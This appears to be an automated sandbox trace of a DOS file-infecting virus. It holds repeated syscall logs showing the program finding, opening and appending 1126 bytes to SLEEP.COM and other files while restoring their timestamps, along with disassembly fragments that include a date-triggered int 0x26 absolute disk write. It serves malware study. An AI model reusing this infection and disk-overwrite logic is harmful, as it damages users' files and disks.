2018-12-25T12:45:12.777284696Z 71 PC: 12b49 | Get current directory
2018-12-25T12:45:12.780047009Z 59 PC: 12b54 | Change current directory
2018-12-25T12:45:12.783831652Z 26 PC: 12c08 | Set disk transfer address
2018-12-25T12:45:12.785604654Z 78 PC: 12c16 | Find first file
2018-12-25T12:45:12.797034734Z 61 PC: 12c42 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:45:12.809651607Z 63 PC: 12c54 | Read file or device (Read 8 bytes on handle 5)
2018-12-25T12:45:12.816185034Z 44 PC: 12c8e | Get time 0x12c8e: add dl, dh
0x12c90: je 0x12c8a
0x12c92: mov si, 0x115
0x12c95: add si, word ptr [0x106]
0x12c99: mov byte ptr [si], dl
0x12c9b: mov ax, 0x4301
0x12c9e: xor cx, cx
0x12ca0: mov dx, si
0x12ca2: add dx, 0xca
0x12ca6: int 0x21
0x12ca8: mov ah, 0x3e
0x12caa: int 0x21
0x12cac: mov ax, 0x3d02
0x12caf: int 0x21
0x12cb1: jb 0x12c63
0x12cb3: mov di, dx
0x12cb5: add di, 0x63
0x12cb8: stosw word ptr es:[di], ax
0x12cb9: xchg ax, bx
0x12cba: mov ah, 0x40
2018-12-25T12:45:12.818474921Z 67 PC: 12ca8 | Get or set file attributes
2018-12-25T12:45:14.18028959Z 62 PC: 12cac | Close file
2018-12-25T12:45:14.182969346Z 61 PC: 12cb1 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:45:14.19122065Z 64 PC: 12cc4 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:45:14.19412667Z 64 PC: 12cd6 | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:45:14.196653088Z 64 PC: 12ceb | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:45:14.199863557Z 66 PC: 12cf4 | Move file pointer
2018-12-25T12:45:14.201642136Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:45:14.204113713Z 64 PC: 12a98 | Write file or device (Write 1126 bytes on handle 5)
2018-12-25T12:45:14.214936407Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:45:14.217019823Z 87 PC: 12d0d | Get or set file date and time
2018-12-25T12:45:14.218361552Z 62 PC: 12d11 | Close file
2018-12-25T12:45:14.226597906Z 67 PC: 12d22 | Get or set file attributes
2018-12-25T12:45:14.237454069Z 79 PC: 12c2a | Find next file
2018-12-25T12:45:14.240063083Z 61 PC: 12c42 | Open file (See above)
2018-12-25T12:45:14.247032461Z 63 PC: 12c54 | Read file or device (See above)
2018-12-25T12:45:14.253301216Z 44 PC: 12c8e | Get time (See above)
2018-12-25T12:45:14.255296431Z 67 PC: 12ca8 | Get or set file attributes (See above)
2018-12-25T12:45:14.265806878Z 62 PC: 12cac | Close file (See above)
2018-12-25T12:45:14.268044984Z 61 PC: 12cb1 | Open file (See above)
2018-12-25T12:45:14.274565941Z 64 PC: 12cc4 | Write file or device (See above)
2018-12-25T12:45:14.277654181Z 64 PC: 12cd6 | Write file or device (See above)
2018-12-25T12:45:14.280320849Z 64 PC: 12ceb | Write file or device (See above)
2018-12-25T12:45:14.282845782Z 66 PC: 12cf4 | Move file pointer (See above)
2018-12-25T12:45:14.284209258Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:45:14.286575711Z 64 PC: 12a98 | Write file or device (See above)
2018-12-25T12:45:14.295600929Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:45:14.298035555Z 87 PC: 12d0d | Get or set file date and time (See above)
2018-12-25T12:45:14.300824822Z 62 PC: 12d11 | Close file (See above)
2018-12-25T12:45:14.308571917Z 67 PC: 12d22 | Get or set file attributes (See above)
2018-12-25T12:45:14.318417478Z 79 PC: 12c2a | Find next file (See above)
2018-12-25T12:45:14.322058086Z 61 PC: 12c42 | Open file (See above)
2018-12-25T12:45:14.328707977Z 63 PC: 12c54 | Read file or device (See above)
2018-12-25T12:45:14.335268282Z 44 PC: 12c8e | Get time (See above)
2018-12-25T12:45:14.338066377Z 67 PC: 12ca8 | Get or set file attributes (See above)
2018-12-25T12:45:14.348130895Z 62 PC: 12cac | Close file (See above)
2018-12-25T12:45:14.349856777Z 61 PC: 12cb1 | Open file (See above)
2018-12-25T12:45:14.35786507Z 64 PC: 12cc4 | Write file or device (See above)
2018-12-25T12:45:14.360616234Z 64 PC: 12cd6 | Write file or device (See above)
2018-12-25T12:45:14.364080657Z 64 PC: 12ceb | Write file or device (See above)
2018-12-25T12:45:14.367591624Z 66 PC: 12cf4 | Move file pointer (See above)
2018-12-25T12:45:14.368983938Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:45:14.371024513Z 64 PC: 12a98 | Write file or device (See above)
2018-12-25T12:45:14.380134002Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:45:14.382398972Z 87 PC: 12d0d | Get or set file date and time (See above)
2018-12-25T12:45:14.383770864Z 62 PC: 12d11 | Close file (See above)
2018-12-25T12:45:14.393524489Z 67 PC: 12d22 | Get or set file attributes (See above)
2018-12-25T12:45:14.401661966Z 42 PC: 12b6f | Get date 0x12b6f: cmp dx, 0x606
0x12b73: je 0x12b78
0x12b75: jmp 0x12d94
0x12b78: jmp 0x12d28
0x12b7b: and ah, bh
0x12b7d: movsw word ptr es:[di], word ptr [si]
0x12b7e: mov ax, 0x5c4c
0x12b81: add word ptr [di], ax
0x12b83: add byte ptr [di - 0x75], dl
0x12b86: in al, dx
0x12b87: sub sp, 0x2c
0x12b8a: push si
0x12b8b: jmp 0x12bfd
0x12b8d: nop
0x12b8e: mov ah, 0x1a
0x12b90: lea dx, word ptr [bp - 0x2c]
0x12b93: int 0x21
0x12b95: mov ah, 0x4e
0x12b97: mov cx, 0x10
0x12b9a: mov dx, 0x1b8
2018-12-25T12:45:14.403458418Z 59 PC: 12d9f | Change current directory
2018-12-25T12:45:14.409353191Z 59 PC: 12da6 | Change current directory

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":16046,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:45:14.180045088Z 42 PC: 12a5a | Get date 0x12a5a: cmp dl, 2
0x12a5d: je 0x12a62
0x12a5f: jmp 0x12a80
0x12a61: nop
0x12a62: cli
0x12a63: mov ah, 2
0x12a65: cdq
0x12a66: mov cx, 0x100
0x12a69: int 0x26
0x12a6b: jmp 0x12a6e
0x12a6d: nop
0x12a6e: cli
0x12a6f: mov al, 3
0x12a71: mov cx, 0x2bc
0x12a74: mov dx, 0
0x12a77: mov ds, word ptr [di + 0x63]
0x12a7a: mov bx, word ptr [di + 0x37]
0x12a7d: call 0x22a62
0x12a80: ret
0x12a81: lodsb al, byte ptr [si]
2018-12-25T12:45:14.182890443Z 71 PC: 12b49 | Get current directory
2018-12-25T12:45:14.185989762Z 59 PC: 12b54 | Change current directory
2018-12-25T12:45:14.190279857Z 26 PC: 12c08 | Set disk transfer address
2018-12-25T12:45:14.191575172Z 78 PC: 12c16 | Find first file
2018-12-25T12:45:14.202552327Z 61 PC: 12c42 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:45:14.215600092Z 63 PC: 12c54 | Read file or device (Read 8 bytes on handle 5)
2018-12-25T12:45:14.222543213Z 44 PC: 12c8e | Get time 0x12c8e: add dl, dh
0x12c90: je 0x12c8a
0x12c92: mov si, 0x115
0x12c95: add si, word ptr [0x106]
0x12c99: mov byte ptr [si], dl
0x12c9b: mov ax, 0x4301
0x12c9e: xor cx, cx
0x12ca0: mov dx, si
0x12ca2: add dx, 0xca
0x12ca6: int 0x21
0x12ca8: mov ah, 0x3e
0x12caa: int 0x21
0x12cac: mov ax, 0x3d02
0x12caf: int 0x21
0x12cb1: jb 0x12c63
0x12cb3: mov di, dx
0x12cb5: add di, 0x63
0x12cb8: stosw word ptr es:[di], ax
0x12cb9: xchg ax, bx
0x12cba: mov ah, 0x40
2018-12-25T12:45:14.236331564Z 67 PC: 12ca8 | Get or set file attributes
2018-12-25T12:45:14.254234752Z 62 PC: 12cac | Close file
2018-12-25T12:45:14.256314406Z 61 PC: 12cb1 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:45:14.263896173Z 64 PC: 12cc4 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:45:14.266829017Z 64 PC: 12cd6 | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:45:14.269474992Z 64 PC: 12ceb | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:45:14.272511903Z 66 PC: 12cf4 | Move file pointer
2018-12-25T12:45:14.274000233Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:45:14.276333584Z 64 PC: 12a98 | Write file or device (Write 1126 bytes on handle 5)
2018-12-25T12:45:14.286606421Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:45:14.288956628Z 87 PC: 12d0d | Get or set file date and time
2018-12-25T12:45:14.290350144Z 62 PC: 12d11 | Close file
2018-12-25T12:45:14.299018148Z 67 PC: 12d22 | Get or set file attributes
2018-12-25T12:45:14.309928926Z 79 PC: 12c2a | Find next file
2018-12-25T12:45:14.312728366Z 61 PC: 12c42 | Open file (See above)
2018-12-25T12:45:14.320361646Z 63 PC: 12c54 | Read file or device (See above)
2018-12-25T12:45:14.327524545Z 44 PC: 12c8e | Get time (See above)
2018-12-25T12:45:14.330003885Z 67 PC: 12ca8 | Get or set file attributes (See above)
2018-12-25T12:45:14.341666463Z 62 PC: 12cac | Close file (See above)
2018-12-25T12:45:14.34380199Z 61 PC: 12cb1 | Open file (See above)
2018-12-25T12:45:14.351090725Z 64 PC: 12cc4 | Write file or device (See above)
2018-12-25T12:45:14.353955136Z 64 PC: 12cd6 | Write file or device (See above)
2018-12-25T12:45:14.356958697Z 64 PC: 12ceb | Write file or device (See above)
2018-12-25T12:45:14.359766805Z 66 PC: 12cf4 | Move file pointer (See above)
2018-12-25T12:45:14.361265877Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:45:14.364005858Z 64 PC: 12a98 | Write file or device (See above)
2018-12-25T12:45:14.373302727Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:45:14.375450372Z 87 PC: 12d0d | Get or set file date and time (See above)
2018-12-25T12:45:14.377109636Z 62 PC: 12d11 | Close file (See above)
2018-12-25T12:45:14.382720897Z 67 PC: 12d22 | Get or set file attributes (See above)
2018-12-25T12:45:14.393720791Z 79 PC: 12c2a | Find next file (See above)
2018-12-25T12:45:14.396818319Z 61 PC: 12c42 | Open file (See above)
2018-12-25T12:45:14.401046581Z 63 PC: 12c54 | Read file or device (See above)
2018-12-25T12:45:14.405364551Z 44 PC: 12c8e | Get time (See above)
2018-12-25T12:45:14.407253225Z 67 PC: 12ca8 | Get or set file attributes (See above)
2018-12-25T12:45:14.413602697Z 62 PC: 12cac | Close file (See above)
2018-12-25T12:45:14.414794685Z 61 PC: 12cb1 | Open file (See above)
2018-12-25T12:45:14.419641867Z 64 PC: 12cc4 | Write file or device (See above)
2018-12-25T12:45:14.42147197Z 64 PC: 12cd6 | Write file or device (See above)
2018-12-25T12:45:14.423101235Z 64 PC: 12ceb | Write file or device (See above)
2018-12-25T12:45:14.425033295Z 66 PC: 12cf4 | Move file pointer (See above)
2018-12-25T12:45:14.426226611Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:45:14.427549007Z 64 PC: 12a98 | Write file or device (See above)
2018-12-25T12:45:14.433590575Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:45:14.435439945Z 87 PC: 12d0d | Get or set file date and time (See above)
2018-12-25T12:45:14.436590527Z 62 PC: 12d11 | Close file (See above)
2018-12-25T12:45:14.441811136Z 67 PC: 12d22 | Get or set file attributes (See above)
2018-12-25T12:45:14.448174788Z 42 PC: 12b6f | Get date 0x12b6f: cmp dx, 0x606
0x12b73: je 0x12b78
0x12b75: jmp 0x12d94
0x12b78: jmp 0x12d28
0x12b7b: and ah, bh
0x12b7d: movsw word ptr es:[di], word ptr [si]
0x12b7e: mov ax, 0x5c4c
0x12b81: add word ptr [di], ax
0x12b83: add byte ptr [di - 0x75], dl
0x12b86: in al, dx
0x12b87: sub sp, 0x2c
0x12b8a: push si
0x12b8b: jmp 0x12bfd
0x12b8d: nop
0x12b8e: mov ah, 0x1a
0x12b90: lea dx, word ptr [bp - 0x2c]
0x12b93: int 0x21
0x12b95: mov ah, 0x4e
0x12b97: mov cx, 0x10
0x12b9a: mov dx, 0x1b8
2018-12-25T12:45:14.449634948Z 59 PC: 12d9f | Change current directory
2018-12-25T12:45:14.455018624Z 59 PC: 12da6 | Change current directory

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":16046,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:45:14.538649623Z 42 PC: 12a5a | Get date 0x12a5a: cmp dl, 2
0x12a5d: je 0x12a62
0x12a5f: jmp 0x12a80
0x12a61: nop
0x12a62: cli
0x12a63: mov ah, 2
0x12a65: cdq
0x12a66: mov cx, 0x100
0x12a69: int 0x26
0x12a6b: jmp 0x12a6e
0x12a6d: nop
0x12a6e: cli
0x12a6f: mov al, 3
0x12a71: mov cx, 0x2bc
0x12a74: mov dx, 0
0x12a77: mov ds, word ptr [di + 0x63]
0x12a7a: mov bx, word ptr [di + 0x37]
0x12a7d: call 0x22a62
0x12a80: ret
0x12a81: lodsb al, byte ptr [si]
2018-12-25T12:45:14.541414519Z 71 PC: 12b49 | Get current directory
2018-12-25T12:45:14.544530802Z 59 PC: 12b54 | Change current directory
2018-12-25T12:45:14.548710647Z 26 PC: 12c08 | Set disk transfer address
2018-12-25T12:45:14.550249726Z 78 PC: 12c16 | Find first file
2018-12-25T12:45:14.562146972Z 61 PC: 12c42 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:45:14.575077155Z 63 PC: 12c54 | Read file or device (Read 8 bytes on handle 5)
2018-12-25T12:45:14.582350453Z 44 PC: 12c8e | Get time 0x12c8e: add dl, dh
0x12c90: je 0x12c8a
0x12c92: mov si, 0x115
0x12c95: add si, word ptr [0x106]
0x12c99: mov byte ptr [si], dl
0x12c9b: mov ax, 0x4301
0x12c9e: xor cx, cx
0x12ca0: mov dx, si
0x12ca2: add dx, 0xca
0x12ca6: int 0x21
0x12ca8: mov ah, 0x3e
0x12caa: int 0x21
0x12cac: mov ax, 0x3d02
0x12caf: int 0x21
0x12cb1: jb 0x12c63
0x12cb3: mov di, dx
0x12cb5: add di, 0x63
0x12cb8: stosw word ptr es:[di], ax
0x12cb9: xchg ax, bx
0x12cba: mov ah, 0x40
2018-12-25T12:45:14.584696053Z 67 PC: 12ca8 | Get or set file attributes
2018-12-25T12:45:14.60110932Z 62 PC: 12cac | Close file
2018-12-25T12:45:14.602735628Z 61 PC: 12cb1 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:45:14.610001636Z 64 PC: 12cc4 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:45:14.614169495Z 64 PC: 12cd6 | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:45:14.617012382Z 64 PC: 12ceb | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:45:14.620002419Z 66 PC: 12cf4 | Move file pointer
2018-12-25T12:45:14.621424798Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:45:14.623544402Z 64 PC: 12a98 | Write file or device (Write 1126 bytes on handle 5)
2018-12-25T12:45:14.633104248Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:45:14.635968826Z 87 PC: 12d0d | Get or set file date and time
2018-12-25T12:45:14.637457307Z 62 PC: 12d11 | Close file
2018-12-25T12:45:14.646400113Z 67 PC: 12d22 | Get or set file attributes
2018-12-25T12:45:14.657858559Z 79 PC: 12c2a | Find next file
2018-12-25T12:45:14.66064796Z 61 PC: 12c42 | Open file (See above)
2018-12-25T12:45:14.668264667Z 63 PC: 12c54 | Read file or device (See above)
2018-12-25T12:45:14.67524829Z 44 PC: 12c8e | Get time (See above)
2018-12-25T12:45:14.677547247Z 67 PC: 12ca8 | Get or set file attributes (See above)
2018-12-25T12:45:14.688937915Z 62 PC: 12cac | Close file (See above)
2018-12-25T12:45:14.690871023Z 61 PC: 12cb1 | Open file (See above)
2018-12-25T12:45:14.698729247Z 64 PC: 12cc4 | Write file or device (See above)
2018-12-25T12:45:14.702076798Z 64 PC: 12cd6 | Write file or device (See above)
2018-12-25T12:45:14.704946857Z 64 PC: 12ceb | Write file or device (See above)
2018-12-25T12:45:14.70769801Z 66 PC: 12cf4 | Move file pointer (See above)
2018-12-25T12:45:14.709186876Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:45:14.711600719Z 64 PC: 12a98 | Write file or device (See above)
2018-12-25T12:45:14.72071176Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:45:14.722839955Z 87 PC: 12d0d | Get or set file date and time (See above)
2018-12-25T12:45:14.724496047Z 62 PC: 12d11 | Close file (See above)
2018-12-25T12:45:14.732655968Z 67 PC: 12d22 | Get or set file attributes (See above)
2018-12-25T12:45:14.743305281Z 79 PC: 12c2a | Find next file (See above)
2018-12-25T12:45:14.746309043Z 61 PC: 12c42 | Open file (See above)
2018-12-25T12:45:14.753828402Z 63 PC: 12c54 | Read file or device (See above)
2018-12-25T12:45:14.761749508Z 44 PC: 12c8e | Get time (See above)
2018-12-25T12:45:14.764824004Z 67 PC: 12ca8 | Get or set file attributes (See above)
2018-12-25T12:45:14.775867731Z 62 PC: 12cac | Close file (See above)
2018-12-25T12:45:14.777550812Z 61 PC: 12cb1 | Open file (See above)
2018-12-25T12:45:14.782846901Z 64 PC: 12cc4 | Write file or device (See above)
2018-12-25T12:45:14.785289409Z 64 PC: 12cd6 | Write file or device (See above)
2018-12-25T12:45:14.787146485Z 64 PC: 12ceb | Write file or device (See above)
2018-12-25T12:45:14.78998723Z 66 PC: 12cf4 | Move file pointer (See above)
2018-12-25T12:45:14.791099132Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:45:14.792650903Z 64 PC: 12a98 | Write file or device (See above)
2018-12-25T12:45:14.79869679Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:45:14.801161116Z 87 PC: 12d0d | Get or set file date and time (See above)
2018-12-25T12:45:14.802669549Z 62 PC: 12d11 | Close file (See above)
2018-12-25T12:45:14.810962139Z 67 PC: 12d22 | Get or set file attributes (See above)
2018-12-25T12:45:14.8218105Z 42 PC: 12b6f | Get date 0x12b6f: cmp dx, 0x606
0x12b73: je 0x12b78
0x12b75: jmp 0x12d94
0x12b78: jmp 0x12d28
0x12b7b: and ah, bh
0x12b7d: movsw word ptr es:[di], word ptr [si]
0x12b7e: mov ax, 0x5c4c
0x12b81: add word ptr [di], ax
0x12b83: add byte ptr [di - 0x75], dl
0x12b86: in al, dx
0x12b87: sub sp, 0x2c
0x12b8a: push si
0x12b8b: jmp 0x12bfd
0x12b8d: nop
0x12b8e: mov ah, 0x1a
0x12b90: lea dx, word ptr [bp - 0x2c]
0x12b93: int 0x21
0x12b95: mov ah, 0x4e
0x12b97: mov cx, 0x10
0x12b9a: mov dx, 0x1b8
2018-12-25T12:45:14.824772233Z 59 PC: 12d9f | Change current directory
2018-12-25T12:45:14.829032297Z 59 PC: 12da6 | Change current directory

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":16046,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:45:14.802324026Z 42 PC: 12a5a | Get date 0x12a5a: cmp dl, 2
0x12a5d: je 0x12a62
0x12a5f: jmp 0x12a80
0x12a61: nop
0x12a62: cli
0x12a63: mov ah, 2
0x12a65: cdq
0x12a66: mov cx, 0x100
0x12a69: int 0x26
0x12a6b: jmp 0x12a6e
0x12a6d: nop
0x12a6e: cli
0x12a6f: mov al, 3
0x12a71: mov cx, 0x2bc
0x12a74: mov dx, 0
0x12a77: mov ds, word ptr [di + 0x63]
0x12a7a: mov bx, word ptr [di + 0x37]
0x12a7d: call 0x22a62
0x12a80: ret
0x12a81: lodsb al, byte ptr [si]
2018-12-25T12:45:14.805079982Z 71 PC: 12b49 | Get current directory
2018-12-25T12:45:14.808154791Z 59 PC: 12b54 | Change current directory
2018-12-25T12:45:14.812536851Z 26 PC: 12c08 | Set disk transfer address
2018-12-25T12:45:14.813612743Z 78 PC: 12c16 | Find first file
2018-12-25T12:45:14.824895598Z 61 PC: 12c42 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:45:14.842236558Z 63 PC: 12c54 | Read file or device (Read 8 bytes on handle 5)
2018-12-25T12:45:14.850632905Z 44 PC: 12c8e | Get time 0x12c8e: add dl, dh
0x12c90: je 0x12c8a
0x12c92: mov si, 0x115
0x12c95: add si, word ptr [0x106]
0x12c99: mov byte ptr [si], dl
0x12c9b: mov ax, 0x4301
0x12c9e: xor cx, cx
0x12ca0: mov dx, si
0x12ca2: add dx, 0xca
0x12ca6: int 0x21
0x12ca8: mov ah, 0x3e
0x12caa: int 0x21
0x12cac: mov ax, 0x3d02
0x12caf: int 0x21
0x12cb1: jb 0x12c63
0x12cb3: mov di, dx
0x12cb5: add di, 0x63
0x12cb8: stosw word ptr es:[di], ax
0x12cb9: xchg ax, bx
0x12cba: mov ah, 0x40
2018-12-25T12:45:14.853272582Z 67 PC: 12ca8 | Get or set file attributes
2018-12-25T12:45:14.870969517Z 62 PC: 12cac | Close file
2018-12-25T12:45:14.87263022Z 61 PC: 12cb1 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:45:14.87990288Z 64 PC: 12cc4 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:45:14.882684168Z 64 PC: 12cd6 | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:45:14.885255192Z 64 PC: 12ceb | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:45:14.888163237Z 66 PC: 12cf4 | Move file pointer
2018-12-25T12:45:14.889178738Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:45:14.890658531Z 64 PC: 12a98 | Write file or device (Write 1126 bytes on handle 5)
2018-12-25T12:45:14.896669751Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:45:14.898207094Z 87 PC: 12d0d | Get or set file date and time
2018-12-25T12:45:14.89930589Z 62 PC: 12d11 | Close file
2018-12-25T12:45:14.904697746Z 67 PC: 12d22 | Get or set file attributes
2018-12-25T12:45:14.911280577Z 79 PC: 12c2a | Find next file
2018-12-25T12:45:14.913065543Z 61 PC: 12c42 | Open file (See above)
2018-12-25T12:45:14.917542702Z 63 PC: 12c54 | Read file or device (See above)
2018-12-25T12:45:14.921722165Z 44 PC: 12c8e | Get time (See above)
2018-12-25T12:45:14.923205003Z 67 PC: 12ca8 | Get or set file attributes (See above)
2018-12-25T12:45:14.930541031Z 62 PC: 12cac | Close file (See above)
2018-12-25T12:45:14.931803799Z 61 PC: 12cb1 | Open file (See above)
2018-12-25T12:45:14.936173481Z 64 PC: 12cc4 | Write file or device (See above)
2018-12-25T12:45:14.93822199Z 64 PC: 12cd6 | Write file or device (See above)
2018-12-25T12:45:14.940186482Z 64 PC: 12ceb | Write file or device (See above)
2018-12-25T12:45:14.941956172Z 66 PC: 12cf4 | Move file pointer (See above)
2018-12-25T12:45:14.942992896Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:45:14.944628582Z 64 PC: 12a98 | Write file or device (See above)
2018-12-25T12:45:14.951532364Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:45:14.95420303Z 87 PC: 12d0d | Get or set file date and time (See above)
2018-12-25T12:45:14.956701368Z 62 PC: 12d11 | Close file (See above)
2018-12-25T12:45:14.965989619Z 67 PC: 12d22 | Get or set file attributes (See above)
2018-12-25T12:45:14.980820206Z 79 PC: 12c2a | Find next file (See above)
2018-12-25T12:45:14.98457376Z 61 PC: 12c42 | Open file (See above)
2018-12-25T12:45:14.991757219Z 63 PC: 12c54 | Read file or device (See above)
2018-12-25T12:45:14.99885588Z 44 PC: 12c8e | Get time (See above)
2018-12-25T12:45:15.001778248Z 67 PC: 12ca8 | Get or set file attributes (See above)
2018-12-25T12:45:15.013120357Z 62 PC: 12cac | Close file (See above)
2018-12-25T12:45:15.015008155Z 61 PC: 12cb1 | Open file (See above)
2018-12-25T12:45:15.022858836Z 64 PC: 12cc4 | Write file or device (See above)
2018-12-25T12:45:15.025899437Z 64 PC: 12cd6 | Write file or device (See above)
2018-12-25T12:45:15.028882768Z 64 PC: 12ceb | Write file or device (See above)
2018-12-25T12:45:15.032187754Z 66 PC: 12cf4 | Move file pointer (See above)
2018-12-25T12:45:15.034454066Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:45:15.037005767Z 64 PC: 12a98 | Write file or device (See above)
2018-12-25T12:45:15.047412691Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:45:15.04990334Z 87 PC: 12d0d | Get or set file date and time (See above)
2018-12-25T12:45:15.051451074Z 62 PC: 12d11 | Close file (See above)
2018-12-25T12:45:15.060581882Z 67 PC: 12d22 | Get or set file attributes (See above)
2018-12-25T12:45:15.071502115Z 42 PC: 12b6f | Get date 0x12b6f: cmp dx, 0x606
0x12b73: je 0x12b78
0x12b75: jmp 0x12d94
0x12b78: jmp 0x12d28
0x12b7b: and ah, bh
0x12b7d: movsw word ptr es:[di], word ptr [si]
0x12b7e: mov ax, 0x5c4c
0x12b81: add word ptr [di], ax
0x12b83: add byte ptr [di - 0x75], dl
0x12b86: in al, dx
0x12b87: sub sp, 0x2c
0x12b8a: push si
0x12b8b: jmp 0x12bfd
0x12b8d: nop
0x12b8e: mov ah, 0x1a
0x12b90: lea dx, word ptr [bp - 0x2c]
0x12b93: int 0x21
0x12b95: mov ah, 0x4e
0x12b97: mov cx, 0x10
0x12b9a: mov dx, 0x1b8
2018-12-25T12:45:15.07385451Z 59 PC: 12d9f | Change current directory
2018-12-25T12:45:15.078609696Z 59 PC: 12da6 | Change current directory

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":16046,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:45:15.221564544Z 42 PC: 12a5a | Get date 0x12a5a: cmp dl, 2
0x12a5d: je 0x12a62
0x12a5f: jmp 0x12a80
0x12a61: nop
0x12a62: cli
0x12a63: mov ah, 2
0x12a65: cdq
0x12a66: mov cx, 0x100
0x12a69: int 0x26
0x12a6b: jmp 0x12a6e
0x12a6d: nop
0x12a6e: cli
0x12a6f: mov al, 3
0x12a71: mov cx, 0x2bc
0x12a74: mov dx, 0
0x12a77: mov ds, word ptr [di + 0x63]
0x12a7a: mov bx, word ptr [di + 0x37]
0x12a7d: call 0x22a62
0x12a80: ret
0x12a81: lodsb al, byte ptr [si]
2018-12-25T12:45:15.223788962Z 71 PC: 12b49 | Get current directory
2018-12-25T12:45:15.225739407Z 59 PC: 12b54 | Change current directory
2018-12-25T12:45:15.228363564Z 26 PC: 12c08 | Set disk transfer address
2018-12-25T12:45:15.229595811Z 78 PC: 12c16 | Find first file
2018-12-25T12:45:15.233503945Z 61 PC: 12c42 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:45:15.23808057Z 63 PC: 12c54 | Read file or device (Read 8 bytes on handle 5)
2018-12-25T12:45:15.242305437Z 44 PC: 12c8e | Get time 0x12c8e: add dl, dh
0x12c90: je 0x12c8a
0x12c92: mov si, 0x115
0x12c95: add si, word ptr [0x106]
0x12c99: mov byte ptr [si], dl
0x12c9b: mov ax, 0x4301
0x12c9e: xor cx, cx
0x12ca0: mov dx, si
0x12ca2: add dx, 0xca
0x12ca6: int 0x21
0x12ca8: mov ah, 0x3e
0x12caa: int 0x21
0x12cac: mov ax, 0x3d02
0x12caf: int 0x21
0x12cb1: jb 0x12c63
0x12cb3: mov di, dx
0x12cb5: add di, 0x63
0x12cb8: stosw word ptr es:[di], ax
0x12cb9: xchg ax, bx
0x12cba: mov ah, 0x40
2018-12-25T12:45:15.245049452Z 67 PC: 12ca8 | Get or set file attributes
2018-12-25T12:45:15.265603566Z 62 PC: 12cac | Close file
2018-12-25T12:45:15.267415913Z 61 PC: 12cb1 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:45:15.280520072Z 64 PC: 12cc4 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:45:15.288159353Z 64 PC: 12cd6 | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:45:15.290961163Z 64 PC: 12ceb | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:45:15.294116682Z 66 PC: 12cf4 | Move file pointer
2018-12-25T12:45:15.295560245Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:45:15.29768033Z 64 PC: 12a98 | Write file or device (Write 1126 bytes on handle 5)
2018-12-25T12:45:15.307122163Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:45:15.309580691Z 87 PC: 12d0d | Get or set file date and time
2018-12-25T12:45:15.311120662Z 62 PC: 12d11 | Close file
2018-12-25T12:45:15.319526999Z 67 PC: 12d22 | Get or set file attributes
2018-12-25T12:45:15.326263144Z 79 PC: 12c2a | Find next file
2018-12-25T12:45:15.328082933Z 61 PC: 12c42 | Open file (See above)
2018-12-25T12:45:15.332933199Z 63 PC: 12c54 | Read file or device (See above)
2018-12-25T12:45:15.337092095Z 44 PC: 12c8e | Get time (See above)
2018-12-25T12:45:15.338565794Z 67 PC: 12ca8 | Get or set file attributes (See above)
2018-12-25T12:45:15.345306081Z 62 PC: 12cac | Close file (See above)
2018-12-25T12:45:15.347268357Z 61 PC: 12cb1 | Open file (See above)
